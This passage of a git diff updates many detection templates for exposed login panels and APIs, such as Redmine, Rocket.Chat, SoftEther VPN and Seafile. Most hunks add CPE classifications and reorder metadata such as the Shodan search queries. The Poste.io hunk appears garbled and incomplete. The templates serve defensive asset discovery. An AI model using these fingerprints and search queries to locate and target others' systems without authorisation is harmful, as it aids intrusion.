-# digest: 490a00463044022065e92a16562f4a5df1f0055d74193cd5dc32662c3176ee099b23644fb0e5f5cb02203643298e7db07f9b93d1dca6e1b8f47dc42f647ebef4d6fe24715cced3a9d2c4:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022065e92a16562f4a5df1f0055d74193cd5dc32662c3176ee099b23644fb0e5f5cb02203643298e7db07f9b93d1dca6e1b8f47dc42f647ebef4d6fe24715cced3a9d2c4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/posteio-admin-panel.yaml b/http/exposed-panels/posteio-admin-panel.yaml
index c634b1aaad..567c560858 100644
--- a/http/exposed-panels/posteio-admin-panel.yaml
+++ b/http/exposed-panels/posteio-admin-panel.yaml
@@ -5,16 +5,16 @@ info:
author: ritikchaddha
severity: info
description: Poste.io login panel was detected.
+ classification:
+ cpe: cpe:2.3:a:analogic:poste.io:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Administration login" html:"posteqlikview - accesspoint", "alt=\"qlikview")'
condition: and
-# digest: 4b0a00483046022100fd769581cf8ef26ad1381e88e03b3c3bf12d690e1706450035b5bbe1bd65e702022100902e9ddaaf2b3d12375f96fc62e4f11564019235b79a0e5b61cc37a64b3d95d7:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100fd769581cf8ef26ad1381e88e03b3c3bf12d690e1706450035b5bbe1bd65e702022100902e9ddaaf2b3d12375f96fc62e4f11564019235b79a0e5b61cc37a64b3d95d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/redis-enterprise-panel.yaml b/http/exposed-panels/redis-enterprise-panel.yaml
index f25a55fd90..6603c37410 100644
--- a/http/exposed-panels/redis-enterprise-panel.yaml
+++ b/http/exposed-panels/redis-enterprise-panel.yaml
@@ -4,16 +4,16 @@ info:
name: Redis Enterprise - Detect
author: tess
severity: info
+ classification:
+ cpe: cpe:2.3:a:redis:redis_enterprise:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Enterprise-Class Redis for Developers"
- product: redis_enterprise
vendor: redis
+ product: redis_enterprise
+ shodan-query: title:"Enterprise-Class Redis for Developers"
tags: panel,redis,enterprise
- classification:
- cpe: cpe:2.3:a:redis:redis_enterprise:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200f6c08f44dd05a50b4b45b00db29b66f006f3d5e8e33576fbc9171aedee91115022100dee17012ef53687681c6bc3886f57cbd4c4ed8b349cf2acec25e71f4c7577231:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200f6c08f44dd05a50b4b45b00db29b66f006f3d5e8e33576fbc9171aedee91115022100dee17012ef53687681c6bc3886f57cbd4c4ed8b349cf2acec25e71f4c7577231:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/redmine-panel.yaml b/http/exposed-panels/redmine-panel.yaml
index ccb9179d78..4acd66a7af 100644
--- a/http/exposed-panels/redmine-panel.yaml
+++ b/http/exposed-panels/redmine-panel.yaml
@@ -7,16 +7,16 @@ info:
description: Redmine login panel was detected.
reference:
- https://www.redmine.org/
+ classification:
+ cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:'content="Redmine'
- product: redmine
vendor: redmine
+ product: redmine
+ shodan-query: http.html:'content="Redmine'
tags: panel,redmine,login,detect
- classification:
- cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- 'status_code == 200'
- 'contains(body, "content=\"Redmine")'
condition: and
-# digest: 4b0a00483046022100d9b0e50f13ca98e0c3ba5e2eb5b76dd14fb16facbc34ae8219a36072b8d47820022100e0a32cf92100515311bb77cc9b08b53d355faaaeb067385a4ee3a91cf0f842e9:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d9b0e50f13ca98e0c3ba5e2eb5b76dd14fb16facbc34ae8219a36072b8d47820022100e0a32cf92100515311bb77cc9b08b53d355faaaeb067385a4ee3a91cf0f842e9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/rocketchat-panel.yaml b/http/exposed-panels/rocketchat-panel.yaml
index 3fd871a8f7..a0ba831043 100644
--- a/http/exposed-panels/rocketchat-panel.yaml
+++ b/http/exposed-panels/rocketchat-panel.yaml
@@ -7,16 +7,16 @@ info:
description: RocketChat login panel was detected.
reference:
- https://www.rocket.chat/
+ classification:
+ cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Rocket.Chat"
- product: rocket.chat
vendor: rocket.chat
+ product: rocket.chat
+ shodan-query: http.title:"Rocket.Chat"
tags: panel,rocketchat,login,detect
- classification:
- cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +30,5 @@ http:
- 'status_code == 200'
- 'contains_any(body, "Rocket.Chat", "content=\"Rocket.Chat")'
condition: and
-# digest: 490a004630440220033e04196ae5d3e3dfa2d2e4002c34f06bd31d9033b6ca3fe79b1e4b98f8285f02201d5223d270c17cdb518372cdc2092703bfa4adb03532a5a62a71ba226c7fa05d:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220033e04196ae5d3e3dfa2d2e4002c34f06bd31d9033b6ca3fe79b1e4b98f8285f02201d5223d270c17cdb518372cdc2092703bfa4adb03532a5a62a71ba226c7fa05d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/scriptcase/scriptcase-panel.yaml b/http/exposed-panels/scriptcase/scriptcase-panel.yaml
index a11079da5a..64a612a5f6 100644
--- a/http/exposed-panels/scriptcase/scriptcase-panel.yaml
+++ b/http/exposed-panels/scriptcase/scriptcase-panel.yaml
@@ -7,16 +7,16 @@ info:
reference:
- https://www.scriptcase.com.br
- https://www.scriptcase.net
+ classification:
+ cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"ScriptCase"
- product: scriptcase
vendor: scriptcase
+ product: scriptcase
+ shodan-query: title:"ScriptCase"
tags: panel,scriptcase
- classification:
- cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -45,4 +45,5 @@ http:
group: 2
regex:
- '(Versão|Version|Versão)\b.*\s(\d.*\d)'
-# digest: 490a0046304402205a8d693dc627b35099e8f8a938545e8e5aa981966322354b7aa9dae20a390c5d022023abab98e64708d72e49a00998f63710354c6dee059d402f6c5d78cb49771137:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205a8d693dc627b35099e8f8a938545e8e5aa981966322354b7aa9dae20a390c5d022023abab98e64708d72e49a00998f63710354c6dee059d402f6c5d78cb49771137:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml
index 879273450e..5b528a0dcd 100644
--- a/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml
+++ b/http/exposed-panels/scriptcase/scriptcase-prod-login.yaml
@@ -7,16 +7,16 @@ info:
reference:
- https://www.scriptcase.com.br
- https://www.scriptcase.net
+ classification:
+ cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"ScriptCase"
- product: scriptcase
vendor: scriptcase
+ product: scriptcase
+ shodan-query: title:"ScriptCase"
tags: panel,scriptcase
- classification:
- cpe: cpe:2.3:a:scriptcase:scriptcase:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -45,4 +45,5 @@ http:
group: 2
regex:
- '(Versão|Version|Versão)\b.*\s(\d.*\d)'
-# digest: 4a0a00473045022100a1f63ba4755f71bcfa7a5e4971361942694134f5fbf88f5ab9849e3b0a0f636902202b6055d7de79b5904703e3988e4e2c45dc54156e70e94ef605b9ad4f36407636:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100a1f63ba4755f71bcfa7a5e4971361942694134f5fbf88f5ab9849e3b0a0f636902202b6055d7de79b5904703e3988e4e2c45dc54156e70e94ef605b9ad4f36407636:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/softether-vpn-panel.yaml b/http/exposed-panels/softether-vpn-panel.yaml
index 641f4fc880..bf86cad1f1 100644
--- a/http/exposed-panels/softether-vpn-panel.yaml
+++ b/http/exposed-panels/softether-vpn-panel.yaml
@@ -6,16 +6,16 @@ info:
severity: info
description: |
SoftEther VPN panel was detected.
+ classification:
+ cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"SoftEther VPN Server"
- product: vpn
vendor: softether
+ product: vpn
+ shodan-query: http.title:"SoftEther VPN Server"
tags: panel,vpn,softether
- classification:
- cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 202
-# digest: 490a0046304402200a36a6e1faa606ce97fa5812df11437d36096fd07363f4e2e9f98edf14d1ae4402207cdab6009066338ccc5cfa9a33d8c9bbe38f36c3aac7c07d6982a69b95ebbf6a:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402200a36a6e1faa606ce97fa5812df11437d36096fd07363f4e2e9f98edf14d1ae4402207cdab6009066338ccc5cfa9a33d8c9bbe38f36c3aac7c07d6982a69b95ebbf6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/speedtest-panel.yaml b/http/exposed-panels/speedtest-panel.yaml
index 574b0b4df3..25ab795545 100644
--- a/http/exposed-panels/speedtest-panel.yaml
+++ b/http/exposed-panels/speedtest-panel.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/alexjustesen/speedtest-tracker
- https://docs.speedtest-tracker.dev/
+ classification:
+ cpe: cpe:2.3:a:speed_test_project:speed_test:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Speedtest Tracker"
- product: speed_test
vendor: speed_test_project
+ product: speed_test
+ shodan-query: title:"Speedtest Tracker"
tags: speedtest,tracker,panel,login
- classification:
- cpe: cpe:2.3:a:speed_test_project:speed_test:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022012154c7388107665fc92c1493e926400bfb5b50e5a531817733d3afe1126b40d0221009f67a14c9eb6274d0f124a06338895f40b39032907a4e367386ea223bdb84437:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022012154c7388107665fc92c1493e926400bfb5b50e5a531817733d3afe1126b40d0221009f67a14c9eb6274d0f124a06338895f40b39032907a4e367386ea223bdb84437:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/suprema-biostar-panel.yaml b/http/exposed-panels/suprema-biostar-panel.yaml
index b5c75905dc..be0eb973a6 100644
--- a/http/exposed-panels/suprema-biostar-panel.yaml
+++ b/http/exposed-panels/suprema-biostar-panel.yaml
@@ -4,16 +4,16 @@ info:
name: Suprema BioStar 2 Panel - Detect
author: ritikchaddha
severity: info
+ classification:
+ cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Biostar"
- product: biostar_2
vendor: supremainc
+ product: biostar_2
+ shodan-query: title:"Biostar"
tags: panel,login,biostar,detect
- classification:
- cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022027e0261bae05a635e278ac51c0f4d96060518d672e582784f74eb3a6872d1469022100eb95ec2877b0c5f60b46250289b597e1a8384f84662d27eae567d40c3d3874a2:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022027e0261bae05a635e278ac51c0f4d96060518d672e582784f74eb3a6872d1469022100eb95ec2877b0c5f60b46250289b597e1a8384f84662d27eae567d40c3d3874a2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/tibco-spotfire-panel.yaml b/http/exposed-panels/tibco-spotfire-panel.yaml
index f562167335..b7916e1003 100644
--- a/http/exposed-panels/tibco-spotfire-panel.yaml
+++ b/http/exposed-panels/tibco-spotfire-panel.yaml
@@ -8,6 +8,8 @@ info:
TIBCO Spotfire login panel was detected.
reference:
- https://www.tibco.com/products/tibco-spotfire
+ classification:
+ cpe: cpe:2.3:a:tibco:spotfire_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -16,8 +18,6 @@ info:
vendor: tibco
tags: panel,tibco,login,detect
- classification:
- cpe: cpe:2.3:a:tibco:spotfire_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml
index da795f1812..9dbcb106c5 100644
--- a/http/exposed-panels/tigase-xmpp-server.yaml
+++ b/http/exposed-panels/tigase-xmpp-server.yaml
@@ -6,16 +6,16 @@ info:
severity: info
reference:
- https://www.facebook.com/photo/?fbid=617926933711163&set=a.467014098802448
+ classification:
+ cpe: cpe:2.3:a:tigase:tigase:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Tigase XMPP Server"
- product: tigase
vendor: tigase
+ product: tigase
+ shodan-query: title:"Tigase XMPP Server"
tags: tigase,xmpp,server,panel,exposure
- classification:
- cpe: cpe:2.3:a:tigase:tigase:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -31,4 +31,5 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402202f5f0d783373878478c3b0613b9cfd77ae9102cfb810640e7a102c2d5e13eac1022028c937d9288d5833676178246e7310ace75c441823f88e29ded7854c3b9e8488:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202f5f0d783373878478c3b0613b9cfd77ae9102cfb810640e7a102c2d5e13eac1022028c937d9288d5833676178246e7310ace75c441823f88e29ded7854c3b9e8488:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml
index 3e7df75bae..df639ddbc0 100644
--- a/http/exposed-panels/tiny-rss-panel.yaml
+++ b/http/exposed-panels/tiny-rss-panel.yaml
@@ -8,16 +8,16 @@ info:
Tiny Tiny RSS is a free RSS feed reader
reference:
- https://tt-rss.org/
+ classification:
+ cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:-418614327
- product: tiny_tiny_rss
vendor: tt-rss
+ product: tiny_tiny_rss
+ shodan-query: http.favicon.hash:-418614327
tags: panel,tiny-rss,login,detect
- classification:
- cpe: cpe:2.3:a:tt-rss:tiny_tiny_rss:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- 'status_code==200'
- 'contains_any(body, "Tiny Tiny RSS", "ttrss_login", "ttrss_utility")'
condition: and
-# digest: 490a004630440220245d0c3141ee1457aca5389046553a2b3d473e83c038ea05269dfbec590f8b2f022057be7b754f43f0dc143e45929e101b3433b1233176e327568411aae59518d163:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220245d0c3141ee1457aca5389046553a2b3d473e83c038ea05269dfbec590f8b2f022057be7b754f43f0dc143e45929e101b3433b1233176e327568411aae59518d163:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/uipath-orchestrator-panel.yaml b/http/exposed-panels/uipath-orchestrator-panel.yaml
index a680b2165a..f3236c8959 100644
--- a/http/exposed-panels/uipath-orchestrator-panel.yaml
+++ b/http/exposed-panels/uipath-orchestrator-panel.yaml
@@ -8,16 +8,16 @@ info:
UiPath Orchestrator login panel was detected.
reference:
- https://www.uipath.com/
+ classification:
+ cpe: cpe:2.3:a:uipath:orchestrator:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"UiPath Orchestrator"
- product: orchestrator
vendor: uipath
+ product: orchestrator
+ shodan-query: http.title:"UiPath Orchestrator"
tags: panel,uipath,login,detect
- classification:
- cpe: cpe:2.3:a:uipath:orchestrator:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
group: 1
regex:
- '\?(?:version|v)=([0-9.]+)'
-# digest: 4b0a00483046022100b2ea407476958b2d9a6c2496dc5fe79140b611289c470696c516a44887aab487022100db30208178a084a88c0d269d8c40f22d7f7f7bb0a96665e429a0542f06fc8738:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100b2ea407476958b2d9a6c2496dc5fe79140b611289c470696c516a44887aab487022100db30208178a084a88c0d269d8c40f22d7f7f7bb0a96665e429a0542f06fc8738:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/unibox-panel.yaml b/http/exposed-panels/unibox-panel.yaml
index c3bd70c4c6..469d0b4cfd 100644
--- a/http/exposed-panels/unibox-panel.yaml
+++ b/http/exposed-panels/unibox-panel.yaml
@@ -5,16 +5,16 @@ info:
author: theamanrawat
severity: info
description: Unibox Administrator panel was detected.
+ classification:
+ cpe: cpe:2.3:h:indionetworks:unibox:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.favicon.hash:176427349
- product: unibox
vendor: indionetworks
+ product: unibox
+ shodan-query: http.favicon.hash:176427349
tags: panel,unibox,login
- classification:
- cpe: cpe:2.3:h:indionetworks:unibox:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -40,4 +40,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220416d0b591a4f31b4b84203f05617ce7889d4af1132a2daabc23cd308944b12fd022100b0693d29d862994d978b591542e82f4dad1e33d020bb7c234b183913bd87d795:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220416d0b591a4f31b4b84203f05617ce7889d4af1132a2daabc23cd308944b12fd022100b0693d29d862994d978b591542e82f4dad1e33d020bb7c234b183913bd87d795:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml
index b0d21f18db..6f0dc212af 100644
--- a/http/exposed-panels/uptime-kuma-panel.yaml
+++ b/http/exposed-panels/uptime-kuma-panel.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://github.com/louislam/uptime-kuma
- https://github.com/louislam/uptime-kuma/wiki
+ classification:
+ cpe: cpe:2.3:a:uptime.kuma:uptime_kuma:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Uptime Kuma"
- product: uptime_kuma
vendor: uptime.kuma
+ product: uptime_kuma
+ shodan-query: title:"Uptime Kuma"
tags: uptime,kuma,panel,login,detect
- classification:
- cpe: cpe:2.3:a:uptime.kuma:uptime_kuma:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220313780b1f320d07ea8fa501dc89ba05a76ef6f452ec7c38945a08de5f6c2ee420221008a66fa01c2573c674287635fa610df877d2fce286b2492dc4325410719e2feac:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220313780b1f320d07ea8fa501dc89ba05a76ef6f452ec7c38945a08de5f6c2ee420221008a66fa01c2573c674287635fa610df877d2fce286b2492dc4325410719e2feac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/urbackup-panel.yaml b/http/exposed-panels/urbackup-panel.yaml
index 9d8a3ad421..abc2aadb9f 100644
--- a/http/exposed-panels/urbackup-panel.yaml
+++ b/http/exposed-panels/urbackup-panel.yaml
@@ -4,16 +4,16 @@ info:
name: UrBackup Panel - Detect
author: DhiyaneshDk
severity: info
+ classification:
+ cpe: cpe:2.3:a:urbackup:urbackup:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"UrBackup - Keeps your data safe"
- product: urbackup
vendor: urbackup
+ product: urbackup
+ shodan-query: html:"UrBackup - Keeps your data safe"
tags: urbackup,panel,login,detect
- classification:
- cpe: cpe:2.3:a:urbackup:urbackup:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -29,4 +29,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100e2438fa822bd78e1a3fb2db2967d18e37acc757dffb1d901158aad1ba59680be0220762d7f76021679cdeb4190c83c58634cc7ef989462735e610af58664e0bad1f6:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100e2438fa822bd78e1a3fb2db2967d18e37acc757dffb1d901158aad1ba59680be0220762d7f76021679cdeb4190c83c58634cc7ef989462735e610af58664e0bad1f6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/webtransfer-client-panel.yaml b/http/exposed-panels/webtransfer-client-panel.yaml
index f3f558b4f5..7c929cbf22 100644
--- a/http/exposed-panels/webtransfer-client-panel.yaml
+++ b/http/exposed-panels/webtransfer-client-panel.yaml
@@ -7,16 +7,16 @@ info:
description: Progress Web Transfer Client login panel was detected.
reference:
- https://www.progress.com/ftp-server/web-transfer
+ classification:
+ cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.title:"Web Transfer Client"
- product: moveit_transfer
vendor: progress
+ product: moveit_transfer
+ shodan-query: http.title:"Web Transfer Client"
tags: panel,webtransferclient,login,detect
- classification:
- cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- 'status_code == 200'
- 'contains(body, "Web Transfer Client")'
condition: and
-# digest: 490a0046304402203f970565705761cadb9a73e16c172152e3d5df14dea54d907dc07a22563942dc022043f589d0a0b055c65bba328a1cdaecff4b7bbf11cd6eda05974f81a7b73ce2d6:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402203f970565705761cadb9a73e16c172152e3d5df14dea54d907dc07a22563942dc022043f589d0a0b055c65bba328a1cdaecff4b7bbf11cd6eda05974f81a7b73ce2d6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/whatsup-gold-panel.yaml b/http/exposed-panels/whatsup-gold-panel.yaml
index ef441bf024..1d688ff59a 100644
--- a/http/exposed-panels/whatsup-gold-panel.yaml
+++ b/http/exposed-panels/whatsup-gold-panel.yaml
@@ -8,16 +8,16 @@ info:
Whatsup Gold login panel was detected.
reference:
- https://www.whatsupgold.com/
+ classification:
+ cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
- product: whatsup_gold
vendor: progress
+ product: whatsup_gold
+ shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
tags: panel,whatsup-gold,detect
- classification:
- cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,8 +26,8 @@ http:
host-redirects: true
max-redirects: 2
-
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -38,4 +38,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c67d4d7d5825640001925f3e039e7ae1afc956413d37374cc707593dff032a55022100e0f879d303c42e500a96ef5b3437d1b37bb53c49429315c4258dc289ce400844:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c67d4d7d5825640001925f3e039e7ae1afc956413d37374cc707593dff032a55022100e0f879d303c42e500a96ef5b3437d1b37bb53c49429315c4258dc289ce400844:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/yellowfin-panel.yaml b/http/exposed-panels/yellowfin-panel.yaml
index 1e239958d4..7fb0f69425 100644
--- a/http/exposed-panels/yellowfin-panel.yaml
+++ b/http/exposed-panels/yellowfin-panel.yaml
@@ -4,16 +4,16 @@ info:
name: Yellowfin Information Collaboration - Detect
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:yellowfinbi:yellowfin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Yellowfin Information Collaboration"
- product: yellowfin
vendor: yellowfinbi
+ product: yellowfin
+ shodan-query: title:"Yellowfin Information Collaboration"
tags: yellowfin,panel,login
- classification:
- cpe: cpe:2.3:a:yellowfinbi:yellowfin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450221008b84749226927040ea2317b28449b7650b61161446b7a6206974d7e231565a080220693d78f91cd7931bdca6021b28d5354825a1ed9bc834de857e6b585024d2de71:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221008b84749226927040ea2317b28449b7650b61161446b7a6206974d7e231565a080220693d78f91cd7931bdca6021b28d5354825a1ed9bc834de857e6b585024d2de71:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposed-panels/zenml-dashboard-panel.yaml b/http/exposed-panels/zenml-dashboard-panel.yaml
index 80af0f6b33..86be14319d 100644
--- a/http/exposed-panels/zenml-dashboard-panel.yaml
+++ b/http/exposed-panels/zenml-dashboard-panel.yaml
@@ -4,17 +4,17 @@ info:
name: ZenML Dashboard Panel - Detect
author: DhiyaneshDK
severity: info
+ classification:
+ cpe: cpe:2.3:a:zenml:zenml:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: zenml
+ product: zenml
shodan-query: http.favicon.hash:-2028554187
fofa-query: body="ZenML"
- product: zenml
- vendor: zenml
tags: zenml,panel,login
- classification:
- cpe: cpe:2.3:a:zenml:zenml:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,9 +25,10 @@ http:
- type: word
words:
- "ZenML - Dashboard"
-
part: body
+
- type: status
status:
- 200
-# digest: 490a0046304402206853ce42c1640bc82065352996f49d24ae2d5b5a7fafea6e7bbb51d8c9d0a4f80220616607a03c8dbf6af9513b7ace21c20580991ded495eb9998ab30f7ebde65ef9:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402206853ce42c1640bc82065352996f49d24ae2d5b5a7fafea6e7bbb51d8c9d0a4f80220616607a03c8dbf6af9513b7ace21c20580991ded495eb9998ab30f7ebde65ef9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/apis/jeecg-boot-swagger.yaml b/http/exposures/apis/jeecg-boot-swagger.yaml
index 16f509eaad..4dabe83f78 100644
--- a/http/exposures/apis/jeecg-boot-swagger.yaml
+++ b/http/exposures/apis/jeecg-boot-swagger.yaml
@@ -5,17 +5,17 @@ info:
author: ritikchaddha
severity: info
description: Jeecg Swagger Bootstrap UI exposed.
+ classification:
+ cpe: cpe:2.3:a:jeecg:jeecg-boot:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: jeecg
+ product: jeecg-boot
shodan-query: title:"Jeecg-Boot"
fofa-query: title="JeecgBoot 企业级低代码平台"
- product: jeecg-boot
- vendor: jeecg
tags: jeecg,swagger,detect,exposure
- classification:
- cpe: cpe:2.3:a:jeecg:jeecg-boot:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,4 +26,5 @@ http:
part: body
words:
- "Swagger-Bootstrap-UI "
-# digest: 4a0a004730450220399772c6fac159e018e26aec89d85d94a9df282c1213c027e08db8b7e2f0169a022100e5952c927f759d37af355d775a184c33c49feb8ac669322d647f24700fe5d4fa:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220399772c6fac159e018e26aec89d85d94a9df282c1213c027e08db8b7e2f0169a022100e5952c927f759d37af355d775a184c33c49feb8ac669322d647f24700fe5d4fa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/exposures/apis/seafile-api.yaml b/http/exposures/apis/seafile-api.yaml
index 615aea7991..180c68d067 100644
--- a/http/exposures/apis/seafile-api.yaml
+++ b/http/exposures/apis/seafile-api.yaml
@@ -10,16 +10,16 @@ info:
- https://download.seafile.com/published/web-api/home.md
- https://manual.seafile.com/
- https://www.seafile.com/en/home/
+ classification:
+ cpe: cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: http.html:"seafile"
- product: seafile
vendor: seafile
+ product: seafile
+ shodan-query: http.html:"seafile"
tags: exposure,api,detect
- classification:
- cpe: cpe:2.3:a:seafile:seafile:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -50,4 +50,4 @@ http:
regex:
- '"version":\s*"([0-9.]+)"'
-# digest: 4a0a00473045022100c47c1ae5d724d7b5a58f902d8807a9c455951aea612d75bae34e5f0b5fbf0d5f022004cbf64a4224a7d86c861b15ee1983a7b9a0d5ea80efc59b92ff61adb2cc285d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100c47c1ae5d724d7b5a58f902d8807a9c455951aea612d75bae34e5f0b5fbf0d5f022004cbf64a4224a7d86c861b15ee1983a7b9a0d5ea80efc59b92ff61adb2cc285d:922c64590222798bb761d5b6d8e72950
